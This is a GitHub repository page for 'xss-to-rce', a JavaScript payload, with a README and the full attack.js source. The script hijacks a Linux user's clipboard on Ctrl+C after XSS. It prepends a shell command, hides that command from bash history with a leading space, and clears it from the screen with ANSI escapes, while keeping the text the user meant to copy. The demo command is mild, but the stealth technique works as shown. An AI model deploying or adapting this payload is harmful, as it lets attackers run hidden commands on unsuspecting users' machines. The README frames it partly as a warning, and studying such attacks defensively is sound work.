Skip to content
/ xss-to-rce Public

Javascript payload that inject a malicious payload into the copy-buffer of the victim

28 stars 16 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

xapax/xss-to-rce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

README.md

README.md

 
 

attack.js

attack.js

 
 

Repository files navigation

XSS-to-RCE

The use case for this javascript-payload is for websites that encourage linux-users to copy commands straight into the terminal.

If that website contains a XSS vulnerability, or an attacker is able to execute javascript on the page in some other way, the attacker is able to hijack the users clipboard and inject a terminal command that is quite stealthy.

The terminal command that is tricked upon the victim will not be recorded in the terminal history, and it will remove the malicious command from the terminal, by using some ANSI-tricks.

The copied command will also contain the legitimate text that the victim tried to copy, as not to rise suspicion.

So, lesson learned: never copy-paste into your terminal. Or don't allow javascript in your browser.

document.addEventListener('keypress', (event) => {

  // Grab the keys of the user
	var key = event.which || event.keyCode; 
	var ctrl = event.ctrlKey ? event.ctrlKey : ((key === 17) ? true : false); 

	// Only hijack the victims copy-buffer if it is a linux-user
	var os = navigator.platform
	var testIfLinux = os.indexOf("Linux")


	if ((ctrl) && (key == 99) && testIfLinux == !-1){	
		// Get string that the user has highlighted
		var userstring = window.getSelection().toString()
		attack(userstring)
	}

});

function attack(userstring){

	// We need to create a new textarea (or some other element where we can write out text)
	var textarea = document.createElement('textarea');
	// Next we set the value of the text-area to the command we wish to execute
	// Include the initial space in the command so that the command won't be saved in bash history.
	// The ansi-code \033[F is equal to "Go up one line"
	// The ansi-code \033[2K is equal to "Clear this line"
	textarea.value = ' echo dödshackad > /tmp/hackad;printf "\\033[2K";\r\n' + userstring
	// The textarea needs to be appended to the DOM, in order to copy the text from it into the copy-buffer
	document.body.appendChild(textarea);
	// "Highlight" and select the text
	textarea.focus()
	textarea.select();
	document.execCommand("copy");
	document.body.removeChild(textarea);
}

About

Javascript payload that inject a malicious payload into the copy-buffer of the victim

Resources

Readme
Activity

Stars

28 stars

Watchers

4 watching

Forks

16 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages